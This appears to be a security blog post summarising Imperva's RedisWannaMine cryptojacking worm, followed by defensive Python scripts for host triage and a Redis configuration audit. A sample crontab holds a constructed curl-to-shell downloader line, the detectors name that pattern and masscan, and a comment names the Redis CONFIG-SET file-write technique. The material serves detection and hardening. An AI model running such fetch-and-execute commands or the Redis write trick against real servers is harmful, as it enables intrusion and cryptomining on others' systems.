Last week, Imperva disclosed a new crypto-jacking campaign, which it named RedisWannaMine. According to Imperva, the initial attack vector was a well-known Apache Struts web application vulnerability, and the campaign hits both database servers and application servers. Imperva does not say how many vulnerable systems were actually exploited. Imperva noted that most crypto-jacking attacks seen so far have been fairly simple, whereas this one uses a more sophisticated downloader: it is more complex in both evasion and capability, and it shows worm-like behavior, spreading with the leaked NSA EternalBlue exploit for SMBv1 alongside other exploit code.
Imperva found several scripts used by RedisWannaMine. One shell script, transfer.sh, is a downloader that in some ways resembles earlier crypto-jacking downloaders. It establishes persistence on the infected host through a new crontab entry, gives the attacker remote access by adding an SSH key to /root/.ssh/authorized_keys, and adds rules to the system's iptables firewall.
This downloader is a clear step up from earlier crypto-jacking downloaders, though. For one thing, it is self-sufficient: it installs whatever it needs through the standard Linux package managers such as APT and YUM. The script also downloads masscan, a publicly available TCP port scanner, from its GitHub repository and compiles and installs it on the infected host. Per the project's GitHub README, masscan is "the fastest Internet port scanner tool. It can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second."
According to the research, once the malware is settled on the host, the script launches another process that uses masscan to find and infect reachable Redis servers. It scans for TCP port 6379 across both public and private IP ranges. For every host found with that port open, the script runs 'redisrun.sh' to infect the new host with the same crypto-mining malware, and the cycle repeats from there.
RedisWannaMine also uses the EternalBlue SMB exploit against vulnerable Windows servers. The malware launches a second scan process, 'ebscan.sh', that again uses masscan, this time for TCP port 445 across private and public IP ranges, to find and infect Windows hosts still running an unpatched, vulnerable SMBv1.
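Host-side triage for the indicators described above, as an added example that is not code from the post or from Imperva: it checks a crontab dump, an authorized_keys file, iptables-save output and a process list for the four artifacts the downloader leaves behind (a download-and-pipe-to-shell cron job, an unapproved SSH key, ACCEPT rules for the scanned ports, and masscan or the helper scripts running). The sample artifacts, the 198.51.100.23 address and the APPROVED_KEYS inventory are constructed assumptions, not real captures.

```python
"""Triage a Linux host for the persistence and propagation indicators the
post attributes to RedisWannaMine. Every artifact below is constructed for
illustration; on a live host feed in `crontab -l`, the authorized_keys
file, `iptables-save` and `ps -eo pid,cmd` output instead."""
import re
from typing import Dict, Iterable, List, Optional

# --- constructed samples (not real captures) ----------------------------------
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://198.51.100.23/transfer.sh | sh
"""

SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleOpsKey ops@bastion
command="/bin/false" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCexampleAttackerKey root@localhost
"""

# Assumption: the host inventory lists approved keys by type and key blob,
# never by comment, because the comment field is attacker-controlled.
APPROVED_KEYS = {"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleOpsKey"}

SAMPLE_IPTABLES_SAVE = """\
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 6379 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 445 -j ACCEPT
-A INPUT -j DROP
"""

SAMPLE_PS = """\
  PID CMD
  412 /usr/sbin/sshd -D
 2210 /tmp/masscan -p6379 10.0.0.0/8 --rate 10000
 2233 /bin/sh ebscan.sh
"""

# --- detectors ------------------------------------------------------------------
DOWNLOAD_PIPE_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
SCANNED_PORTS = {"6379", "445"}          # Redis and SMB, the two ports the worm scans
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")
WORM_PROCESS = re.compile(r"\bmasscan\b|\bredisrun\.sh\b|\bebscan\.sh\b")


def suspicious_cron_entries(crontab: str) -> List[str]:
    """Cron lines that fetch something over HTTP and pipe it straight into a shell."""
    return [line for line in crontab.splitlines()
            if line.strip() and not line.lstrip().startswith("#")
            and DOWNLOAD_PIPE_SHELL.search(line)]


def key_identity(line: str) -> Optional[str]:
    """'<type> <base64>' for an authorized_keys line, skipping any leading
    options field such as command="...". An options string that itself
    contains a key-type word inside quotes would confuse this tokenizer."""
    parts = line.split()
    for i, tok in enumerate(parts):
        if tok in KEY_TYPES and i + 1 < len(parts):
            return f"{tok} {parts[i + 1]}"
    return None


def unknown_ssh_keys(authorized_keys: str, approved: Iterable[str]) -> List[str]:
    """Key lines whose type+blob is not in the approved inventory."""
    approved = set(approved)
    hits = []
    for line in authorized_keys.splitlines():
        ident = key_identity(line)
        if ident is not None and ident not in approved:
            hits.append(line)
    return hits


def firewall_openings(iptables_save: str) -> List[str]:
    """ACCEPT rules for the ports the worm scans (6379 Redis, 445 SMB)."""
    hits = []
    for line in iptables_save.splitlines():
        m = re.search(r"--dport\s+(\d+)", line)
        if m and m.group(1) in SCANNED_PORTS and "-j ACCEPT" in line:
            hits.append(line)
    return hits


def scanner_processes(ps_output: str) -> List[str]:
    """Running masscan or the redisrun.sh / ebscan.sh helpers named in the post."""
    return [line.strip() for line in ps_output.splitlines() if WORM_PROCESS.search(line)]


def triage(crontab: str, authorized_keys: str, iptables_save: str,
           ps_output: str) -> Dict[str, List[str]]:
    """Return only the indicator classes that produced at least one hit."""
    report = {
        "cron_downloader": suspicious_cron_entries(crontab),
        "unknown_ssh_keys": unknown_ssh_keys(authorized_keys, APPROVED_KEYS),
        "firewall_openings": firewall_openings(iptables_save),
        "scanner_processes": scanner_processes(ps_output),
    }
    return {kind: lines for kind, lines in report.items() if lines}


if __name__ == "__main__":
    for kind, lines in triage(SAMPLE_CRONTAB, SAMPLE_AUTHORIZED_KEYS,
                              SAMPLE_IPTABLES_SAVE, SAMPLE_PS).items():
        print(f"[{kind}]")
        for line in lines:
            print("   ", line)
```

Matching approved keys by type and blob rather than by the trailing comment matters: the downloader controls the comment on the line it appends, so a check that trusts "root@localhost" or similar would miss it.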
According to Imperva's blog post, the final payload is a well-known crypto-miner that mines cryptocurrency and sends the proceeds to an attacker-controlled wallet.
How do you prevent RedisWannaMine?
There are several ways to keep RedisWannaMine off your servers. At a minimum, install system updates and patch applications with the latest security fixes, including the Apache Struts flaw used for initial access. Disable obsolete protocols such as SMBv1 on your network, and use firewalls so that services like Redis (TCP 6379) and SMB (TCP 445) are never reachable from the Internet; Redis itself should bind only to local or private interfaces and require authentication. For more information on this particular attack, you can view Imperva's blog here. –Abdi Hagi
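A configuration check for the Redis exposure this advice targets, added here and not taken from the post: WEAK_CONF and HARDENED_CONF are constructed redis.conf fragments, and audit() returns a code for each setting that leaves an instance reachable and unauthenticated. Renaming the CONFIG command is standard Redis hardening advice (CONFIG SET dir/dbfilename followed by SAVE is the classic way an exposed instance is turned into an arbitrary file write, for instance into /root/.ssh/authorized_keys); the post itself does not describe what redisrun.sh does once it reaches an open port.

```python
"""Audit a redis.conf for the settings that expose a Redis instance to a
scanner like the one described in the post. Both configs are constructed
examples; the finding codes are this script's own."""
import shlex
from typing import Dict, List

WEAK_CONF = """\
# reachable from every interface, no authentication
bind 0.0.0.0
protected-mode no
port 6379
"""

HARDENED_CONF = """\
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass REPLACE_WITH_A_LONG_RANDOM_SECRET
# CONFIG SET dir/dbfilename + SAVE is the classic path from an open Redis
# port to an arbitrary file write, so take the command away entirely
rename-command CONFIG ""
"""

WILDCARD_BINDS = {"0.0.0.0", "::", "*"}


def parse_conf(text: str) -> Dict[str, List[List[str]]]:
    """directive -> the argument list of every occurrence, in file order.
    Redis applies repeated directives in order, and rename-command
    legitimately repeats, so the last value alone is not enough."""
    conf: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)      # handles the "" in rename-command CONFIG ""
        conf.setdefault(tokens[0].lower(), []).append(tokens[1:])
    return conf


def audit(text: str) -> List[str]:
    """Return finding codes; an empty list means none of the checks fired."""
    conf = parse_conf(text)
    findings: List[str] = []

    binds = conf.get("bind")
    if binds is None:
        # No bind directive at all: Redis listens on every interface.
        findings.append("bind-all")
    elif any(addr.lstrip("-") in WILDCARD_BINDS for addr in binds[-1]):
        # lstrip("-") covers the optional "-addr" form accepted by newer Redis.
        findings.append("bind-all")

    # protected-mode defaults to yes since Redis 3.2; earlier versions have
    # no such guard, so on an old build treat "absent" as exposed instead.
    if conf.get("protected-mode", [["yes"]])[-1][0].lower() != "yes":
        findings.append("protected-mode-off")

    if "requirepass" not in conf:
        findings.append("no-requirepass")

    renamed = any(args[0].upper() == "CONFIG" and args[1] != "CONFIG"
                  for args in conf.get("rename-command", []) if len(args) == 2)
    if not renamed:
        findings.append("config-command-exposed")

    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}: {audit(conf) or 'no findings'}")
```

A firewall rule limiting TCP 6379 to the application hosts that actually need it belongs alongside this; the config check catches a server that is listening too widely, while the firewall catches the case where someone later changes the config back.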